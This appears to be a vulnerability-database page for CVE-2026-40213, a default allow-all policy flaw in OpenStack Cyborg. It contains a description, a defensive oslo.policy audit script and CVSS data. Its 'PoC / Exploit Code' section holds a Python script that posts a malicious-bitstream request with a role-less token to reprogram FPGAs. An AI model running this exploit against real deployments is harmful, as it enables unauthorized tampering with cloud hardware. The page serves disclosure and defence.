Security Vulnerability Report
CVE-2026-40213 CVSS 7.4 HIGH

Published: 2026-05-07 22:16:35
Last Modified: 2026-05-08 16:16:11

Description

OpenStack Cyborg before 16.0.1 uses rule:allow (check_str='@') as the default policy for multiple API endpoints. This unconditionally authorizes any request carrying a valid Keystone token regardless of roles, project membership, or scope. An authenticated user with zero role assignments can complete various actions such as reprogramming FPGA bitstreams on arbitrary compute nodes via agent RPC.
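A defender-side audit of the policy pattern the description names, added here as an example that is not taken from the advisory or from Cyborg itself: it resolves `rule:` aliases in an oslo.policy-style JSON file and reports every target whose check string is effectively `@`. The rule names in the sample policy are hypothetical; only the check-string semantics (`@`, the empty string, `rule:` references, flat `or` chains) are oslo.policy's.

```python
import json
import re

# Constructed sample policy in oslo.policy JSON syntax. The target names are
# hypothetical (an assumption, not Cyborg's real policy targets); the point is
# the check strings: "@" and "" are unconditional allows in oslo.policy, and
# "rule:allow" only aliases whatever the "allow" rule resolves to.
SAMPLE_POLICY = json.loads("""
{
  "allow": "@",
  "admin_api": "role:admin",
  "hypothetical:deployable:program": "rule:allow",
  "hypothetical:device:get": "rule:admin_api or project_id:%(project_id)s",
  "hypothetical:arq:create": "",
  "hypothetical:arq:delete": "rule:admin_api"
}
""")


def _is_unconditional(check, policy, seen):
    """True if this check string grants access to any valid token holder."""
    check = check.strip()
    if check in ("@", ""):
        return True
    # "or" binds looser than "and" in oslo.policy: one permissive disjunct
    # makes the whole expression permissive. Parenthesised sub-expressions
    # are not handled here (assumption: flat check strings only).
    disjuncts = re.split(r"\s+or\s+", check)
    if len(disjuncts) > 1:
        return any(_is_unconditional(d, policy, seen) for d in disjuncts)
    if check.startswith("rule:"):
        name = check[len("rule:"):]
        if name in seen:          # cycle guard for self-referencing rules
            return False
        target = policy.get(name)
        if target is None:        # unknown rule: oslo.policy denies
            return False
        return _is_unconditional(target, policy, seen | {name})
    return False


def find_allow_all_rules(policy):
    """Return the policy targets whose check string resolves to allow-all."""
    return sorted(name for name, check in policy.items()
                  if _is_unconditional(check, policy, frozenset()))


if __name__ == "__main__":
    for name in find_allow_all_rules(SAMPLE_POLICY):
        print(f"[!] {name} admits any authenticated token: {SAMPLE_POLICY[name]!r}")
```

Run it against a deployment's generated policy file (for example the output of `oslopolicy-policy-generator`) to list the targets that would need an explicit role or scope check.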

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

OpenStack Cyborg < 16.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Setup target API endpoint for FPGA reprogramming
# This endpoint is vulnerable in versions < 16.0.1
target_url = "http://cyborg-api-service:6666/v2/deployables"

# A valid Keystone token obtained by a low-privileged user
# The user has NO roles assigned, but the token is valid
auth_token = "gAAAAABk..."

headers = {
    "X-Auth-Token": auth_token,
    "Content-Type": "application/json"
}

# Malicious payload to reprogram FPGA bitstream
# This action normally requires admin privileges
payload = {
    "name": "exploit_fpga_reprogram",
    "image_uuid": "malicious-bitstream-uuid-12345"
}

try:
    # Send the request
    response = requests.post(target_url, json=payload, headers=headers)

    # Check if the request was authorized despite lack of roles
    if response.status_code == 202 or response.status_code == 200:
        print("[+] Exploit successful: FPGA reprogrammed without role checks!")
    else:
        print(f"[-] Exploit failed: Status {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"Error: {e}")
```

References

https://bugs.launchpad.net/openstack-cyborg/+bug/2143263
https://security.openstack.org/ossa/OSSA-2026-011.html
https://www.openwall.com/lists/oss-security/2026/05/07/6

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-40213",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-07T22:16:34.910",
    "lastModified": "2026-05-08T16:16:10.770",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenStack Cyborg before 16.0.1 uses rule:allow (check_str='@') as the default policy for multiple API endpoints. This unconditionally authorizes any request carrying a valid Keystone token regardless of roles, project membership, or scope. An authenticated user with zero role assignments can complete various actions such as reprogramming FPGA bitstreams on arbitrary compute nodes via agent RPC."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 3.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-863"}
        ]
      }
    ],
    "references": [
      {"url": "https://bugs.launchpad.net/openstack-cyborg/+bug/2143263", "source": "[email protected]"},
      {"url": "https://security.openstack.org/ossa/OSSA-2026-011.html", "source": "[email protected]"},
      {"url": "https://www.openwall.com/lists/oss-security/2026/05/07/6", "source": "[email protected]"}
    ]
  }
}
```